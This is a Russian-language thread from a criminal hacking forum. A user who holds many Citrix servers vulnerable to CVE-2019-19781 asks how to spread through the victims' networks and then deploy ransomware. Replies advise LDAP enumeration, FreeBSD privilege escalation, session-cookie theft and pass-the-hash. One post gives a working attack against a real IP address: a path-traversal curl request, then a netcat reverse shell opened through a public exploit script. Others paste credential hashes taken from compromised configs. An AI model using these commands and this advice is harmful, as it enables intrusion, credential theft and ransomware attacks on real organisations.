• XSS.stack #1 – первый литературный журнал от юзеров форума

Нужен совет по цитриксам =)

Отслеживать
Octoberine

Octoberine

Blackhat Otaku
Пользователь
Регистрация
29.04.2020
Сообщения
78
Реакции
64
Депозит
0.0015
Приветствую! Подскажите, пожалуйста. Есть у меня гора цитриксов, уязвимых к CVE-2019-19781, туда есть шелл и прочее. Также я знаю пароли от LDAP из конфигов. Куда двигаться дальше? Заранее спасибо!
 
aberkroft сказал(а):
Да. Вообще сначала лучше определиться, цель какая ? Дамп ? Криптолок ?
Доступ к сети полный для начала. Потом криптолок. Я просто не понимаю, что мне дают креды от LDAP. Куда с ними авторизоваться можно и как?
Я представляю как двигаться по эктив директори, имея хотя бы юзерский доступ к любому пк в ней. Но вот как имея доступ в шелл цитрикса от nobody и зная логин:пароль от LDAP получить хотя бы юзерский доступ никак не могу понять.
 
Octoberine сказал(а):
Доступ к сети полный для начала. Потом криптолок. Я просто не понимаю, что мне дают креды от LDAP. Куда с ними авторизоваться можно и как?
Я представляю как двигаться по эктив директори, имея хотя бы юзерский доступ к любому пк в ней. Но вот как имея доступ в шелл цитрикса от nobody и зная логин:пароль от LDAP получить хотя бы юзерский доступ никак не могу понять.

Зная логин/пароль от ldap (я правильно понимаю, что ldap-каталогом является КД АД ?), как минимум можно выгрузить информацию о других логинах. Далее, посмотрите внимательно на сеть, где именно цитриксы - в DMZ ? Далее, посмотрите, нельзя ли сделать privesc на узлах с цитриксом - как минимум, это позволит играть с tcpdump, и посмотреть, какой трафик ходит в сетевом сегменте.
 
aberkroft сказал(а):
Зная логин/пароль от ldap (я правильно понимаю, что ldap-каталогом является КД АД ?), как минимум можно выгрузить информацию о других логинах. Далее, посмотрите внимательно на сеть, где именно цитриксы - в DMZ ? Далее, посмотрите, нельзя ли сделать privesc на узлах с цитриксом - как минимум, это позволит играть с tcpdump, и посмотреть, какой трафик ходит в сетевом сегменте.
Огромное спасибо. Уже что-то. Теперь бы понять как в виндовую сеть посылать виндовые команды с фри. Или я могу использовать цитрикс как прокси для доступа просто? И если да, то как лучше это сделать? Извиняюсь за глупый вопрос, но при попытке так просканить смб у меня ничего не вышло, но может это я что-то не так делаю.
 
Octoberine сказал(а):
Огромное спасибо. Уже что-то. Теперь бы понять как в виндовую сеть посылать виндовые команды с фри. Или я могу использовать цитрикс как прокси для доступа просто? И если да, то как лучше это сделать? Извиняюсь за глупый вопрос, но при попытке так просканить смб у меня ничего не вышло, но может это я что-то не так делаю.


Скорее всего, цитриксы будут в DMZ, доступ из которой в другие сетевые сегменты зафайрволен.Надо понять, какие протоколы разрешены, а для этого (скорее всего) понадобится права привилегированной учётной записи на машине с цитрикс. Поэтому я и начал с эскалации привилегий.
 
Спасибо огромное. Посмотрю сегодня есть ли более-менее актуальные способы privesc для freebsd. Есть ещё вопрос. Насколько я понимаю, цитриксы хранят сессии с куками авторизованных пользователей в /var/snmp и туда есть доступ nobody. Стоит ли ковырять в этом направлении или чужие куки не дадут авторизоваться все равно?
 
Ах, оно на FreeBSD ))

https://www.exploit-db.com/ FreeBSD, там есть локальные эскалации, можно попробовать.

Про куки не скажу навскидку, надо смотреть, что за куки. Если есть ккка - наверняка можно как минимум сессию перехватить И потом, администратор туда не логинится ?
 
Куки как раз только админские лежат. И часто есть свежие. Спасибо. В эту сторону тоже посмотрю. Про эксплойт-дб знаю разумеется, но обычно ищу на гитхабе по более свежим CVE)
 
По локальной эксплуатации для FreeBSD что-то свежее было даже в этом году, и именно на exploit-db. Кстати, на этих же серверах кроме цитрикса ничего прикладного не крутится ? Мониторинг ? Службы инвентаризации железа ? Можно попробовать поискать их настройки/учётки.
 
Мне уже проще пример показать :)
Вот например сервер:
Пробуем его на path traversal:
curl https://218.255.31.174/vpn/../vpns/cfg/smb.conf --insecure --path-as-is
Получаем ответ:
[global]
encrypt passwords = yes
name resolve order = lmhosts wins host bcast
Теперь посмотрим чо у нас там внутри. Возьмём
CVE-2019-19781 ( https://github.com/projectzeroindia/CVE-2019-19781 )
И запустим через него реверс неткат на сервере(предварительно стартовав у себя nc -p ):
bash CVE-2019-19781.sh 218.255.31.174 'nc наш_ип наш_порт –e /bin/bash'
Почитаем конфиг:
cat flash/nsconfig/ns.conf
И получим:

enable ns feature WL LB SSL SSLVPN RESPONDER CH enable ns mode FR L3 Edge USNIP - Pastebin.com

Pastebin.com is the number one paste tool since 2002. Pastebin is a website where you can store text online for a set period of time.
pastebin.com pastebin.com
Он помятый правда, но смысл уловить можно. Пароль от LDAP можно расшифровать.
 
В конфигах цитрикс попадались 3 типа хэшей.
Первый
Код: 
add system user admindm 217f8c5ce50b9cd5a9090d3a853b11f80cee04678ce50f97d08bc6e3d5c90a11fa753766373b01dff69c2880708a93eb0036292e8bdd02df54d9a27748aba3378f9ef43b3 -encrypted -hashmethod SHA512 -externalAuth DISABLED -timeout 900 -logging ENABLED -maxsession 1
Из названия SHA512 в хэшкат 22200 Citrix NetScaler (SHA512) брутить его долго.
Второй
Код: 
add authentication ldapAction LDAP_OTP_NOAUTH -serverIP 192.168.103.254 -ldapBase "dc=c,dc=p" -ldapBindDn admin@c.p -ldapBindDnPassword 800e174bfa7cd17d281715373c321cad972cd8248edc5544b1234ee1e8dd9458 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName userprincipalname -groupAttrName memberOf -subAttributeName cn -secType TLS -ssoNameAttribute userprincipalname -authentication DISABLED -OTPSecret UserParameters
Можно расшифровать скриптом из статьи https://dozer.nz/posts/citrix-decrypt/
Третий похож на предыдущий
Код: 
add authentication ldapAction LDAP_SVR -serverIP 192.168.103.254 -ldapBase "dc=c,dc=p" -ldapBindDn Netscaler.Ldap@c.p -ldapBindDnPassword 0783d45f93abe0d93ca79b0edb4dc7647b3db1ca641c4539dc2b096f60736c90a8f607cf4c40780a1b7e0bfa91301df3 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName userprincipalname -groupAttrName memberOf -subAttributeName cn -secType TLS -ssoNameAttribute userprincipalname
Но немогу определить тип, явно не 1 и не 2, если декодить как второй то получаем kbDfaKHBuNuNYMyvLbUf что явно не то.
Буду признателен за любую подсказку по CVE-2019-19781
 
DrSleep сказал(а):
В конфигах цитрикс попадались 3 типа хэшей.
Первый
Код: 
add system user admindm 217f8c5ce50b9cd5a9090d3a853b11f80cee04678ce50f97d08bc6e3d5c90a11fa753766373b01dff69c2880708a93eb0036292e8bdd02df54d9a27748aba3378f9ef43b3 -encrypted -hashmethod SHA512 -externalAuth DISABLED -timeout 900 -logging ENABLED -maxsession 1
Из названия SHA512 в хэшкат 22200 Citrix NetScaler (SHA512) брутить его долго.
Второй
Код: 
add authentication ldapAction LDAP_OTP_NOAUTH -serverIP 192.168.103.254 -ldapBase "dc=c,dc=p" -ldapBindDn admin@c.p -ldapBindDnPassword 800e174bfa7cd17d281715373c321cad972cd8248edc5544b1234ee1e8dd9458 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName userprincipalname -groupAttrName memberOf -subAttributeName cn -secType TLS -ssoNameAttribute userprincipalname -authentication DISABLED -OTPSecret UserParameters
Можно расшифровать скриптом из статьи https://dozer.nz/posts/citrix-decrypt/
Третий похож на предыдущий
Код: 
add authentication ldapAction LDAP_SVR -serverIP 192.168.103.254 -ldapBase "dc=c,dc=p" -ldapBindDn Netscaler.Ldap@c.p -ldapBindDnPassword 0783d45f93abe0d93ca79b0edb4dc7647b3db1ca641c4539dc2b096f60736c90a8f607cf4c40780a1b7e0bfa91301df3 -encrypted -encryptmethod ENCMTHD_3 -ldapLoginName userprincipalname -groupAttrName memberOf -subAttributeName cn -secType TLS -ssoNameAttribute userprincipalname
Но немогу определить тип, явно не 1 и не 2, если декодить как второй то получаем kbDfaKHBuNuNYMyvLbUf что явно не то.
Буду признателен за любую подсказку по CVE-2019-19781
Можно уточнить, а зачем их брутить ? Pass the hash не пройдет ?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх